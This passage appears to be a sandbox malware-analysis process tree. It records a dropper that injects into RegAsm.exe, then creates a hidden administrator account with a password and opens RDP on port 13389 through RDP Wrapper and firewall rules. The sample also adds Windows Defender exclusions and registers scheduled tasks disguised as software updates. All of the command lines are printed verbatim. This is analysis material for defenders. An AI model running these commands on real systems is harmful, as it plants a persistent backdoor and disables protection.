    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2796
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1476
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      System Location Discovery: System Language Discovery
      PID:2836
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
      Uno.exe.com f
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2908
    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com f
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2768
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1940
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      System Location Discovery: System Language Discovery
      PID:1752
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
      Inebriato.exe.com R
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2624
    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com R
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3040
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:444
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\1119.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\979.vbs
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2980
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\1119.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\979.vbs
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\66.vbs" spaiKmXGMX PMpWMfeWBX "C:\Users\Admin\AppData\Roaming\iLjAI\539.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\figTPULR.bat" "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1100
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\66.vbs" spaiKmXGMX PMpWMfeWBX "C:\Users\Admin\AppData\Roaming\iLjAI\539.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\figTPULR.bat" "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1344
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll" /tn "MySQLNotifierTask78"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1288
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll" /tn "MySQLNotifierTask78"
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2364
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\363.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\979.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll"
        7⤵
        
        PID:1540
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\363.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\979.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1680
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll" /tn "CCleaner Update4"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2376
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll" /tn "CCleaner Update4"
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:816
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\iLjAI\JNIhBGEWXs.bat spaiKmXGMX PMpWMfeWBX"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:880
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2496
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2572
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2552
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2996
        
        C:\Windows\SysWOW64\net.exe
        
        net user spaiKmXGMX PMpWMfeWBX /add
        8⤵
        
        PID:2200
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user spaiKmXGMX PMpWMfeWBX /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2008
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup Administrators spaiKmXGMX /add
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2288
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators spaiKmXGMX /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1784
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" spaiKmXGMX /add
        8⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:876
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" spaiKmXGMX /add
        9⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:2216
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2964
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v spaiKmXGMX /t REG_DWORD /d "00000000" /f
        8⤵
        Hide Artifacts: Hidden Users
        
        PID:1620
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1600
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1912
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2872
        
        C:\Windows\SysWOW64\timeout.exe
        
        Timeout /t 15
        8⤵
        Delays execution with timeout.exe
        
        PID:2920
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
        7⤵
        Loads dropped DLL
        
        PID:2376
        
        C:\Windows\SysWOW64\fsutil.exe
        
        fsutil dirty query C:
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1296
        
        C:\Windows\SysWOW64\sc.exe
        
        sc queryex "TermService"
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:580
        
        C:\Windows\SysWOW64\find.exe
        
        find "STATE"
        8⤵
        
        PID:1528
        
        C:\Windows\SysWOW64\find.exe
        
        find /v "RUNNING"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2096
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2572
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:2992
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1916
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1512
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2824
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c query session rdp-tcp
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2504
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2692
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3040
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:1576
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2832
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:324
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1376
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2984
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2604
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2872
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1236
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[6.1.7601.17514]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\146.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\759.vbs" "V201R1ExQllUbmRaVjJ4TVlsWm9TRlJXWjIxWlYxSkNVMFF4VVZSWVFsaFVWMXBzVmpCS1dVcHRNWFZSYm5CRVZrVlJPV1Y2ClZUSlNWRTE1VWxWS1JreFVaRU5SZW1OMENrNUVhRUpSVXpGQ1RtcE9SVXhWV2tOT2EwNUNUbnBOZUU1NlJUTlNiakE5" "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2160
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\146.vbs" "C:\Users\Admin\AppData\Roaming\iLjAI\759.vbs" "V201R1ExQllUbmRaVjJ4TVlsWm9TRlJXWjIxWlYxSkNVMFF4VVZSWVFsaFVWMXBzVmpCS1dVcHRNWFZSYm5CRVZrVlJPV1Y2ClZUSlNWRTE1VWxWS1JreFVaRU5SZW1OMENrNUVhRUpSVXpGQ1RtcE9SVXhWV2tOT2EwNUNUbnBOZUU1NlJUTlNiakE5" "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll"
        8⤵
        
        PID:1412
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll" /tn "Обновление Браузера Яндекс36"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1532
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\iLjAI\Ozd.dll" /tn "Обновление Браузера Яндекс36"
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3012
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1552

C:\Windows\system32\taskeng.exe
taskeng.exe {1652A976-670A-45DD-9067-31AE22E05B94} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]
1⤵
PID:2636
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\539.vbs" spaiKmXGMX PMpWMfeWBX "C:\Users\Admin\AppData\Roaming\iLjAI\figTPULR.bat"
  2⤵
  PID:2788
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\iLjAI\figTPULR.bat
    3⤵
    - Drops file in System32 directory
    PID:1240
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
      4⤵
      PID:1716
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        5⤵
        
        PID:2576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
      4⤵
      PID:2692
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        5⤵
        
        PID:2504
  - - C:\Windows\system32\net.exe
      net user spaiKmXGMX PMpWMfeWBX /add
      4⤵
      PID:2004
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user spaiKmXGMX PMpWMfeWBX /add
        5⤵
        
        PID:996
  - - C:\Windows\system32\net.exe
      net localgroup Administrators spaiKmXGMX /add
      4⤵
      PID:2444
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators spaiKmXGMX /add
        5⤵
        
        PID:2864
  - - C:\Windows\system32\net.exe
      net localgroup Remote Desktop Users spaiKmXGMX /add
      4⤵
      PID:2732
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Remote Desktop Users spaiKmXGMX /add
        5⤵
        
        PID:2452
  - - C:\Windows\system32\net.exe
      net accounts /maxpwage:unlimited
      4⤵
      PID:2532
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        5⤵
        
        PID:2528
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v spaiKmXGMX /t REG_DWORD /d "00000000" /f
      4⤵
      Hide Artifacts: Hidden Users
      PID:2644
  - - C:\Windows\system32\reg.exe
      reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
      4⤵
      PID:2172
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:3064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:1868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:2316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:2272
  - - C:\Windows\system32\timeout.exe
      Timeout /t 15
      4⤵
      Delays execution with timeout.exe
      PID:1284
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\759.vbs" V201R1ExQllUbmRaVjJ4TVlsWm9TRlJXWjIxWlYxSkNVMFF4VVZSWVFsaFVWMXBzVmpCS1dVcHRNWFZSYm5CRVZrVlJPV1Y2ClZUSlNWRTE1VWxWS1JreFVaRU5SZW1OMENrNUVhRUpSVXpGQ1RtcE9SVXhWV2tOT2EwNUNUbnBOZUU1NlJUTlNiakE5
  2⤵
  - Blocklisted process makes network request
  PID:2912
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\iLjAI\539.vbs" spaiKmXGMX PMpWMfeWBX "C:\Users\Admin\AppData\Roaming\iLjAI\figTPULR.bat"
  2⤵
  PID:2840
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\iLjAI\figTPULR.bat
    3⤵
    - Drops file in System32 directory
    PID:2444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
      4⤵
      PID:3048
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        5⤵
        
        PID:2076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
      4⤵
      PID:2432
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        5⤵
        
        PID:408
  - - C:\Windows\system32\net.exe
      net user spaiKmXGMX PMpWMfeWBX /add
      4⤵
      PID:632
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user spaiKmXGMX PMpWMfeWBX /add
        5⤵
        
        PID:1788
  - - C:\Windows\system32\net.exe
      net localgroup Administrators spaiKmXGMX /add
      4⤵
      PID:1352
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators spaiKmXGMX /add
        5⤵
        
        PID:2480
  - - C:\Windows\system32\net.exe
      net localgroup Remote Desktop Users spaiKmXGMX /add
      4⤵
      PID:448
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Remote Desktop Users spaiKmXGMX /add
        5⤵
        
        PID:928
  - - C:\Windows\system32\net.exe
      net accounts /maxpwage:unlimited
      4⤵
      PID:1804
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        5⤵
        
        PID:668
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v spaiKmXGMX /t REG_DWORD /d "00000000" /f
      4⤵
      Hide Artifacts: Hidden Users
      PID:1176
  - - C:\Windows\system32\reg.exe
      reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
      4⤵
      PID:1280
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2272
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:1756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:1348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
